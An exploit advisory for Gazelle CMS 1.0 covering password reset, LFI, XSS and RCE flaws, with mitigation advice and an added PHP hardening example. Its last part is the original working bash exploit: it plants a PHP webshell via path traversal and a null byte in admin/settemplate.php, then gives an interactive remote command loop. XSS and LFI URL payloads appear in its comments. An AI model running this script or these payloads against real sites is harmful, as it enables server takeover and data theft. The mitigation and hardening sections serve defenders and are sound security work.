Vendor: Gazelle CMS
Author: white_sheep
CVSS: 9.3 (HIGH)
Vulnerability Types: Password Reset, LFI, XSS, RCE
CWE: 79, 94, 79, 78
Product Name: Gazelle CMS
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:anantasoft:gazelle_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
Year: 2009

Gazelle CMS 1.0 Multiple Vulnerabilities

Gazelle CMS 1.0 is affected by several issues: an insecure password reset, local file inclusion (LFI), cross-site scripting (XSS) and remote code execution (RCE). The password reset flaw lets an attacker reset any user's password by requesting renew.php with that user's name in the user parameter. The LFI lets an attacker include arbitrary local files through the template parameter of index.php. The XSS flaws let an attacker inject JavaScript through the user parameter of user.php (which is reflected inside the page title, so a closing </title> tag breaks out of it) and the lookup parameter of search.php. The RCE abuses admin/settemplate.php: the customizetemplate parameter is not checked for path traversal or null bytes, so the posted siteTitle value, which may contain PHP code, is written to a file of the attacker's choosing under the web root and then executed by requesting that file. The LFI and RCE depend on magic_quotes_gpc being off, so that the null byte and quote characters in the request reach PHP unescaped.

Mitigation:

Do not rely on magic_quotes_gpc as protection: the LFI and RCE need it off, but it was a crude escaping crutch, deprecated in PHP 5.3 and removed in 5.4, and it is not a fix. Instead: validate the template parameter of index.php against an allowlist of known template names and reject anything containing path separators or null bytes; apply the same check to the customizetemplate write target in admin/settemplate.php and never write request data into a file the web server will execute as PHP; HTML-encode the user and lookup parameters before they are echoed; require proof of account ownership (for example a token sent to the registered email address) before renew.php changes a password. A WAF rule matching the traversal, null-byte and script-tag patterns shown below buys time but does not remove the bugs. No patch was known at the time of publication, so update only if a fixed release of Gazelle CMS becomes available.
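The following PHP is an added example of the hardening described above; it is not Gazelle CMS code. It shows the shape of the template handling the LFI and RCE rely on beside a version that rejects traversal and null bytes, stores the site title as data rather than as PHP source, and encodes reflected parameters. TEMPLATE_DIR, resolve_template(), h() and save_site_title() are hypothetical names chosen for illustration.

```php
<?php
// Added example, not Gazelle CMS code. TEMPLATE_DIR, resolve_template(), h()
// and save_site_title() are hypothetical names.
declare(strict_types=1);

const TEMPLATE_DIR = __DIR__ . '/templates';

// Vulnerable shape the LFI and RCE rely on: a request value is used as a path
// with no check for "../" or a truncating NUL byte, and request text is written
// into a file PHP will execute.
//   include $_GET['template'];
//   file_put_contents($_GET['customizetemplate'] . '.php', "siteTitle='$siteTitle'");

/**
 * Map a user-supplied template name to a file inside TEMPLATE_DIR.
 * Returns null for anything that is not a plain, existing template name.
 */
function resolve_template(string $name): ?string
{
    // NUL bytes truncate paths in the underlying C calls; refuse them outright
    if (strpos($name, "\0") !== false) {
        return null;
    }
    // Allowlist: a template name is a short identifier, so "../" can never appear
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $name)) {
        return null;
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . $name . '.php');
    // Containment: the resolved file must still sit under the template directory
    // (realpath also returns false for a template that does not exist)
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

/** Escape untrusted text before it is echoed into HTML (user.php, search.php). */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Persist the site title as data, never as PHP source: settemplate.php's bug is
 * that request text ends up inside a file the web server executes.
 */
function save_site_title(string $title): void
{
    $json = json_encode(['siteTitle' => $title], JSON_THROW_ON_ERROR);
    file_put_contents(TEMPLATE_DIR . '/settings.json', $json, LOCK_EX);
}

// Usage in a front controller (index.php): reject bad names instead of "sanitizing" them
$tpl = resolve_template($_GET['template'] ?? 'default');
if ($tpl === null) {
    http_response_code(400);
    exit('invalid template');
}
include $tpl;

// Reflecting a parameter inside <title>: h() turns "</title><script>" into inert text
echo '<title>' . h($_GET['user'] ?? '') . '</title>';
```

The allowlist regex already rules out separators and "..", so the realpath containment check is a second line of defence (it also catches a symlink planted inside the template directory). Rejecting with a 400 rather than stripping characters avoids the usual sanitiser bypasses, and the password-reset fix is not shown here because it is a workflow change (a token tied to the account's email), not a line of validation.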

Exploit-DB raw data:

#!/bin/bash
#       Gazelle CMS 1.0 Multiple Vulnerabilities
#       Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
#       Found by white_sheep on 11/08/2009
#       Contact: sheewhite@googlemail.com - https://www.ihteam.net
#       Needs magic_quotes_gpc Off for RCE and LFI (the null byte and quotes must reach PHP unescaped)
#       Thanks to r00t
#
#               PASSWORD RESET:
# http://localhost/gazelle/renew.php?user=[username]
#
#               LFI:
# author: fuzion (milw0rm.com/author/1343)
# http://localhost/gazelle/index.php?template=[LFI]
#
#               XSS:
# http://localhost/gazelle/user.php?user=</title>[XSS]
# http://localhost/gazelle/search.php?lookup=<script+type="text/javascript">[CODE]</script>
#
#               RCE:
echo
echo "###############################################"
echo "#             GazelleCMS 1.0 RCE              #"
echo "#  by white_sheep                             #"
echo "#  sheewhite[at]googlemail[dot]com            #"
echo "#                                             #"
echo "#           https://www.ihteam.net            #"
echo "###############################################"
echo

# PHP stub that is written into the template file; the INIT/EOF markers around it
# let each command's output be cut out of the surrounding page content.
EVILC='<?php passthru($_GET[cmd]); ?>'

echo -n "Insert url with path (ex.: http://localhost/gazelle): "
read -r SITE

# Random file name so repeated runs do not collide; the .php suffix makes it executable.
PAGENAME="/modules/menu$RANDOM.bak.php"

# admin/settemplate.php writes the posted siteTitle into the file named by
# customizetemplate. "../" walks out of the template directory and the trailing
# %00 truncates whatever the script appends to the name (magic_quotes_gpc must be off).
curl -F "siteTitle='INIT'$EVILC'EOF';type=text/html" "$SITE/admin/settemplate.php?customizetemplate=..$PAGENAME%00" >/dev/null 2>&1

# Verify the backdoor landed: the new file should echo the siteTitle marker back.
if [ "$(curl -s "$SITE$PAGENAME" | grep siteTitle)" = "" ]
then
	echo "[-] Not Vulnerable :( byee"
	exit 1
fi

# Interactive loop: spaces become '+' so the whole command survives as one GET parameter.
while true
do
	echo -n "sh$: "
	read -r CMD
	CMD=$(echo "$CMD" | sed 's/ /+/g')
	echo "$CMD"
	# Strip everything before the INIT marker and after the EOF marker on each line.
	curl -s "$SITE$PAGENAME?cmd=$CMD" | sed "s/.*'INIT'//g;s/'EOF'.*//g"
	echo
done

# milw0rm.com [2009-08-12]